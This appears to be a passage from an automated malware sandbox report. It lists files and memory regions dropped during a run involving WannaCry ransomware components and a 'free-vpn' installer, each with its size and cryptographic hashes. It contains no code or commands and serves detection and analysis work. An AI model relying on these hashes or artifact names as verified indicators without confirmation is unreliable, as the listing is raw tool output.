
SHA512
c430cccc8a5809c180bb08ffa31506f81fffe0043cf3de1ed20fe8bcae1f05aec2a90f98c5f299851ee79c51f304db78c4310c41bb2dc2df3b333143fdeb1299

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
808a32be098b691303a417d933a9d349

SHA1
6de5468aed1a6ce8f53d2cfc07c4ce1cfdf316c2

SHA256
7e076a28058dc808f0750f55bf2a37cd19e223cdb815f89b6f236f86d810c773

SHA512
10f32905734b48ab0ed7b6a6381fcfd139c4345ed5ee2affddf93aa1dd8714c37b32a9f67cb314a9449c96eb9b3ff1d5d8d9b4a99d26191b5719ac88a6b3e467

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
acc518102af83de7bb52474036d207f3

SHA1
e198c607851f2c3bbcba0292ac24d32f3ad13171

SHA256
3e71edc1aa9ccd20fc8ca40784906f833f74d3a7dd3d30a2ab65a91ddda6757a

SHA512
1dfd019e26485988450e86cdb06fa6f59ea94a05eef3d9b9deea591c46010e264172672d27bd2336b371848fdcb44a57cb12ee4c052680489361eae027b6edf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a36743976c2c1ef37eba72fc5e286937

SHA1
d99aa594e609b9e9f9252b4a79a6c40b625bd0b8

SHA256
6b487af2f2f57760cd1e3f241f00235b4449f03f47127c29ef2991c04f8b1172

SHA512
cf53a49e8f08cdb92c2b9db0fb0f7b2191fd5a29d31577357bf0498d29aa8b867943430620075672be6062992dba0ac13a6fee63687d036dd0106ffac3ae05a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
93443e58ddf35c347e64d27347462692

SHA1
e075aa53a31e6adc5abd0c4f095e40336e18004a

SHA256
63f2e3fddfd34f4973e4ea47a386ed48f477c15a98fa420f7e141946b453ec61

SHA512
ffd10ea709891694f00ae87e8deb7e9065e6fc4df718720a2828dc8cbaeacc0da586e2d7c9a54eea814ab2839d937e6d7435800918531c4760bbaac44e56af98

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4DN82.tmp\RAV_Cross.png

Filesize
56KB

MD5
4167c79312b27c8002cbeea023fe8cb5

SHA1
fda8a34c9eba906993a336d01557801a68ac6681

SHA256
c3bf350627b842bed55e6a72ab53da15719b4f33c267a6a132cb99ff6afe3cd8

SHA512
4815746e5e30cbef626228601f957d993752a3d45130feeda335690b7d21ed3d6d6a6dc0ad68a1d5ba584b05791053a4fc7e9ac7b64abd47feaa8d3b919353bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4DN82.tmp\mainlogo.jpg

Filesize
2KB

MD5
c5ed9d772ac3c785d04354de54f9791e

SHA1
48d8914342fcf3be151f5db77a74e92a597f1915

SHA256
33483b91c11c8f06a6bead4efd4b380b84282a2ab1eaff9913675a02aa2067e1

SHA512
99b5fdeaff1adb0b0da1c975fbf24347bd163039d3a0248725baa487e3767d5e9e517a1730f0a32e78cd4595ec163b8beb1ae725349fffbba21353d9ad748c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LAG1M.tmp\free-vpn-3.2-installer_96-miv1.tmp

Filesize
3.1MB

MD5
db28fcc0fffc6630fe26b980989bcef7

SHA1
5df0b8072c9d6e5eb5f60300ff021774c03fed4b

SHA256
03f35384c001acb1a19371cfc66afd98507b1ad93b4b20cb530679c64b2a8a86

SHA512
e323d28d5e7b8b37a545f52cf7310edfdf6a3c5a3ce0d7e2a2e37ecfc5b72de9c39fb9db177d5420dd16503e4d39a04b59d55f0d84132aa6764349444859ffc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UEPGK.tmp\free-vpn-3.2-installer.tmp

Filesize
687KB

MD5
c49b0148cb58b886f60cb32eb5e81439

SHA1
9c64093d08c5ea02a3622f2b616546d3c67a2360

SHA256
fc13f965789a342dba0784492c2e2797ab92bdeaa6532e125b04be81675c0810

SHA512
70968fa616ff38b39e9b266c38f99e4b25a749d5f84706c3302e2e218cfcf9b18cc8bd2017d630ed27fc7e291a748477f23bb9d447745654d06ca58845ea918b

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
933B

MD5
7e6b6da7c61fcb66f3f30166871def5b

SHA1
00f699cf9bbc0308f6e101283eca15a7c566d4f9

SHA256
4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

SHA512
e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\c.wnry

Filesize
780B

MD5
93f33b83f1f263e2419006d6026e7bc1

SHA1
1a4b36c56430a56af2e0ecabd754bf00067ce488

SHA256
ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

SHA512
45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

Download Submit
C:\Users\Admin\Downloads\free-vpn-3.2-installer.exe

Filesize
385KB

MD5
8c60385f5649a99352af911cb135b066

SHA1
bd0a09e495f8709155433e965743b13b70f9bb8a

SHA256
257cdbde2005eb461de7b6f683473be0f08f8c6a43750b65aa67d409eb6b84de

SHA512
7c5cf33fdfbd750d8d0481f944e241ae55c782a7e60cb1f4ecfacca40c92af01849cb57ffa9f8a432e7109feff0c38661829e91f72c0eae2e13a26776bebccc1

Download Submit
C:\Users\Admin\Downloads\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Downloads\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Downloads\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Downloads\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Downloads\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Downloads\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Downloads\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Downloads\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Downloads\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
memory/2892-894-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/2964-143-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/3448-67-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3448-0-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3448-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/3448-105-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4332-137-0x0000000003140000-0x000000000314E000-memory.dmp

Filesize
56KB

Download
memory/4332-136-0x0000000000FF0000-0x0000000001060000-memory.dmp

Filesize
448KB

Download
memory/4332-141-0x000000001EB50000-0x000000001EB88000-memory.dmp

Filesize
224KB

Download
memory/4332-142-0x000000001EB20000-0x000000001EB2E000-memory.dmp

Filesize
56KB

Download
memory/4332-138-0x000000001BCA0000-0x000000001BCA8000-memory.dmp

Filesize
32KB

Download
memory/4336-6-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4336-28-0x0000000004440000-0x0000000004580000-memory.dmp

Filesize
1.2MB

Download
memory/4336-29-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4336-68-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4336-65-0x0000000004440000-0x0000000004580000-memory.dmp

Filesize
1.2MB

Download
memory/4336-48-0x0000000004440000-0x0000000004580000-memory.dmp

Filesize
1.2MB

Download
memory/4336-49-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4336-103-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/4400-144-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4400-88-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5616-2408-0x0000000073880000-0x0000000073A9C000-memory.dmp

Filesize
2.1MB

Download
memory/5616-2405-0x0000000073B60000-0x0000000073BE2000-memory.dmp

Filesize
520KB

Download
memory/5616-2470-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2475-0x0000000073880000-0x0000000073A9C000-memory.dmp

Filesize
2.1MB

Download
memory/5616-2477-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2427-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2424-0x0000000073880000-0x0000000073A9C000-memory.dmp

Filesize
2.1MB

Download
memory/5616-2419-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2417-0x0000000073880000-0x0000000073A9C000-memory.dmp

Filesize
2.1MB

Download
memory/5616-2412-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2404-0x0000000073BF0000-0x0000000073C0C000-memory.dmp

Filesize
112KB

Download
memory/5616-2432-0x0000000073880000-0x0000000073A9C000-memory.dmp

Filesize
2.1MB

Download
memory/5616-2406-0x0000000073AA0000-0x0000000073B22000-memory.dmp

Filesize
520KB

Download
memory/5616-2407-0x0000000073B30000-0x0000000073B52000-memory.dmp

Filesize
136KB

Download
memory/5616-2409-0x0000000073800000-0x0000000073877000-memory.dmp

Filesize
476KB

Download
memory/5616-2403-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2389-0x0000000073B30000-0x0000000073B52000-memory.dmp

Filesize
136KB

Download
memory/5616-2386-0x0000000073AA0000-0x0000000073B22000-memory.dmp

Filesize
520KB

Download
memory/5616-2388-0x0000000073B60000-0x0000000073BE2000-memory.dmp

Filesize
520KB

Download
memory/5616-2390-0x0000000000FF0000-0x00000000012EE000-memory.dmp

Filesize
3.0MB

Download
memory/5616-2387-0x0000000073880000-0x0000000073A9C000-memory.dmp

Filesize
2.1MB

Download